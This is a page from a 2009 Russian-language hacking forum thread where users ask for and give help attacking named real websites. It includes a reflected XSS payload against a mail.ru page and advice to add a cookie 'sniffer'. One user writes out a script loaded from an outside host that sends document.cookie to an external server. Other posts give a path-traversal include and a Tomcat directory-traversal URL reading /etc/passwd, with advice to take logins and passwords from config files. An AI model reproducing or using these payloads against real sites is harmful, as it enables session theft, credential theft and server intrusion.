ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 587 из 1393 « Первая < 87487537577 583 584 585 586 587 588 589 590 591 5976376871087 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #5861  
Старый 09.03.2009, 21:13
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию
В basic используется Base64 шифрование.
 
Ответить с цитированием

  #5862  
Старый 09.03.2009, 21:18
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию
Для передачи - шифрование base64, но в самих файлах (.htpasswd) пассы обычно зашифрованы DES'ом
 
Ответить с цитированием

  #5863  
Старый 09.03.2009, 21:56
roddik
Познающий
Регистрация: 14.01.2009
Сообщений: 93
Провел на форуме:
244235

Репутация: 39
По умолчанию
Цитата:
Сообщение от faza02  
http://www.zabihah.com/da.php?id=../
можно ли что нибудь проинклудить, при вот таом префиксе..
http://www.zabihah.com/da.php?id=1/../../../../../index
 
Ответить с цитированием

  #5864  
Старый 10.03.2009, 10:45
Seshh
Новичок
Регистрация: 04.03.2009
Сообщений: 23
Провел на форуме:
59175

Репутация: 0
По умолчанию

Вопрос:
допустим я нашол XSS - http://torg.mail.ru/news/?0103/2009"><script>alert(document.cookie)</script>

Вопрос, как её заносить в ссылку на моём хосте по которой должен отклик от жертвы произойти, со скриптом ("><script>alert(document.cookie)</script>) или без ?????
 
Ответить с цитированием

  #5865  
Старый 10.03.2009, 10:48
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию
Так и заноси, только добавь адрес сниффера и закодируй содиржимое алерта...
 
Ответить с цитированием

  #5866  
Старый 10.03.2009, 10:55
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию
если хош украсть куки тебе ишо нужен сниффер!
тута усе расписано было!
 
Ответить с цитированием

  #5867  
Старый 10.03.2009, 14:42
Seshh
Новичок
Регистрация: 04.03.2009
Сообщений: 23
Провел на форуме:
59175

Репутация: 0
Question
Цитата:
Сообщение от -m0rgan-  
Так и заноси, только добавь адрес сниффера и закодируй содиржимое алерта...
Т.е. выглядеть будет примерно так???:

http://torg.mail.ru/news/?0103/2009"><script>alert(document.cookie)</script>'><script src=http://miliniva.narod.ru/js.js></script>

А в Js.js: img=new Image();img.src="http://antichat.org/s/Seshh.gif?"+document.cookie;
 
Ответить с цитированием

  #5868  
Старый 10.03.2009, 16:02
VIP
Участник форума
Регистрация: 29.12.2004
Сообщений: 105
Провел на форуме:
89596

Репутация: 21
Отправить сообщение для VIP с помощью ICQ
По умолчанию
Как быть offline vkontakte.ru
Цитата:
Сообщение от VIP  
Нагуглил, что проблема решается, если не трогать скрипт profile.php, то есть не заходить на свою страницу и на страницы других пользователей. Но вот вопрос возникает. Как я понимаю сам этот скрипт находится в отдельном файле где-то в кеше и при загрузки странички пользователя он просто исполняется и отправляет инфу о том, что ты онлайн. Но если он находится в кеше стало быть его можно пропатчить что-бы он как бы исполнялся но инфу не отправлял. Честно говоря я ничего не понимаю в этой системе. это всё только мои догадки. Если что-то не так то поправьте меня. Понятно, что можно тупо не заходить на страницы пользователей, но хочется именно заходить и быть offline.

Где под firefox 3 в ubuntu можно найти сам этот profile.php ?
 
Ответить с цитированием

  #5869  
Старый 10.03.2009, 16:48
^YaHoo^
Banned
Регистрация: 02.01.2009
Сообщений: 29
Провел на форуме:
178075

Репутация: 85
Отправить сообщение для ^YaHoo^ с помощью ICQ
По умолчанию
Здравствуйте нашел уязвимость Apache Tomcat v.5.5.26 Directory Traversal на одном игровом сервере http://la2midland.ru вот и мне сканер выдает такую строку http://la2midland.ru:80/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd что с этим можно сделать?
 
Ответить с цитированием

  #5870  
Старый 10.03.2009, 16:55
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию
^YaHoo^ ну ты типо читаешь файлы на сервере, ищи конфигурационные файлы и бери оттуда логины и пассы
 
Ответить с цитированием
Ответ
Страница 587 из 1393 « Первая < 87487537577 583 584 585 586 587 588 589 590 591 5976376871087 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ